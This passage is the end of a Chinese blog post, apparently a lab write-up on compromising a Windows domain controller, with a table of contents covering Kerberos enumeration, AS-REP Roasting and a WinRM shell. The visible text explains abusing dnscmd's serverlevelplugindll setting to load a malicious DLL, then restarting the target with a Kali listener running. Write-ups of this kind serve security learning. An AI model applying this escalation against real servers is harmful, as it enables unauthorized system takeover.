class="line">指定操作的目标服务器。这里指向本地计算机。也可以使用远程服务器的IP地址（如果当前用户有相应权限）。</span><br><span class="line"></span><br><span class="line">/config:</span><br><span class="line">主命令，表示要更改 DNS 服务器的配置设置。</span><br><span class="line"></span><br><span class="line">/serverlevelplugindll:</span><br><span class="line">这是命令的核心和关键。这是一个配置参数，用于指定一个 DNS 服务器级别插件 DLL 的完整路径。</span><br><span class="line">官方用途：微软设计这个功能是为了让开发人员可以为 DNS 服务器编写扩展插件，用于高级查询处理、日志记录、安全过滤等（例如，DNSSEC 功能就是通过此类插件实现的）。</span><br><span class="line">恶意用途：攻击者滥用这个合法的功能，将其指向一个包含恶意代码的 DLL。Windows DNS 服务 (dns.exe) 在启动时，会自动加载这个路径下 DLL 中的一个特定函数。</span><br><span class="line"></span><br><span class="line">C:\Users\tindalos\Documents\dns.dll:</span><br><span class="line">传递给 serverlevelplugindll 参数的值，即恶意 DLL 在目标机器上的存放路径。</span><br></pre></td></tr></table></figure>

<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">在 Kali 上开启监听。此时，通过虚拟化管理平台重启目标服务器(靶机)，即可触发 DLL 加载。</span><br></pre></td></tr></table></figure>


    
  </article>

  
      

  
  
  <div class="nexmoe-post-meta nexmoe-rainbow">
   
    
</div>
  
  
    <script async src="/js/copy-codeblock.js?v=1761991220174"></script>
  

  
      <div class="nexmoe-post-footer">
          
      </div>
  
</div></div><div class="nexmoe-post-right">    <div class="nexmoe-fixed">
        <div class="nexmoe-tool">

            

            
            
            <button class="mdui-fab catalog" style="overflow:unset;">
                <i class="nexmoefont icon-i-catalog"></i>
                <div class="nexmoe-toc">
                    <ol class="toc"><li class="toc-item toc-level-1"><a class="toc-link" href="#dig-%E6%9F%A5%E8%AF%A2-SRV-%E8%AE%B0%E5%BD%95-bicker"><span class="toc-number">1.</span> <span class="toc-text">dig 查询 SRV 记录(bicker)</span></a></li><li class="toc-item toc-level-1"><a class="toc-link" href="#LDAP-%E2%80%93%E4%BF%A1%E6%81%AF%E6%94%B6%E9%9B%86%E4%B8%8E%E4%BE%A6%E5%AF%9F-bicker"><span class="toc-number">2.</span> <span class="toc-text">LDAP –信息收集与侦察(bicker)</span></a></li><li class="toc-item toc-level-1"><a class="toc-link" href="#Kerberos%E7%94%A8%E6%88%B7%E5%90%8D%E6%9E%9A%E4%B8%BE-bicker"><span class="toc-number">3.</span> <span class="toc-text">Kerberos用户名枚举(bicker)</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#Kerbrute"><span class="toc-number">3.1.</span> <span class="toc-text">Kerbrute</span></a></li></ol></li><li class="toc-item toc-level-1"><a class="toc-link" href="#AS-REP-Roasting-%E6%94%BB%E5%87%BB%E5%B0%9D%E8%AF%95-bicker"><span class="toc-number">4.</span> <span class="toc-text">AS-REP Roasting*攻击尝试(bicker)</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#%E6%94%BB%E5%87%BB%E5%89%8D%E6%8F%90%E6%9D%A1%E4%BB%B6"><span class="toc-number">4.0.1.</span> <span class="toc-text">攻击前提条件</span></a><ol class="toc-child"><li class="toc-item toc-level-4"><a class="toc-link" href="#%E7%AC%AC-1-%E6%AD%A5%EF%BC%9A%E5%8F%91%E7%8E%B0%E6%98%93%E5%8F%97%E6%94%BB%E5%87%BB%E7%9A%84%E7%94%A8%E6%88%B7"><span class="toc-number">4.0.1.1.</span> <span class="toc-text">第 1 步：发现易受攻击的用户</span></a></li></ol></li></ol></li></ol></li><li class="toc-item toc-level-1"><a class="toc-link" href="#SMB%E5%8C%BF%E5%90%8D%E5%85%B1%E4%BA%AB%E6%8E%A2%E6%B5%8B-bicker"><span class="toc-number">5.</span> <span class="toc-text">SMB匿名共享探测(bicker)</span></a></li><li class="toc-item toc-level-1"><a class="toc-link" href="#WinRM-%E6%9C%8D%E5%8A%A1%E8%8E%B7%E5%BE%97shell-bicker"><span class="toc-number">6.</span> <span class="toc-text">WinRM 服务获得shell(bicker)</span></a></li><li class="toc-item toc-level-1"><a class="toc-link" href="#%E5%9F%9F%E6%8E%A7%E6%8F%90%E6%9D%83%E2%80%93dnscmd-exe-bicker"><span class="toc-number">7.</span> <span class="toc-text">域控提权–dnscmd.exe(bicker)</span></a></li></ol>
                </div>
            </button>
            

            

            <a href="#nexmoe-content" class="backtop toc-link" aria-label="Back To Top" title="top"><button class="mdui-fab mdui-ripple"><i class="nexmoefont icon-caret-top"></i></button></a>
        </div>
    </div>
</div></div><div id="nexmoe-footer"><!--!--></div><div id="nexmoe-search-space"><div class="search-container"><div class="search-header"><div class="search-input-container"><input class="search-input" type="text" placeholder="搜索" onInput="sinput();"></div><a class="search-close" onclick="sclose();">×</a></div><div class="search-body"></div></div></div><div><script async src="https://pagead2.googlesyndication.com/pagead/js/adsbygoogle.js?client=ca-pub-2058306854838448" crossorigin="anonymous"></script>
</div></body></html>